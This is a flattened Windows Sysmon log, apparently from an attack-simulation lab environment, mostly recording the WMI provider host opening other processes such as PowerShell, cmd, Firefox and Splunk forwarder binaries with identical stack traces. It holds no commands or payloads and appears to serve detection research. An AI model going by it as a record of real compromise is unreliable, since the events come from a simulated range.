16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.173{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 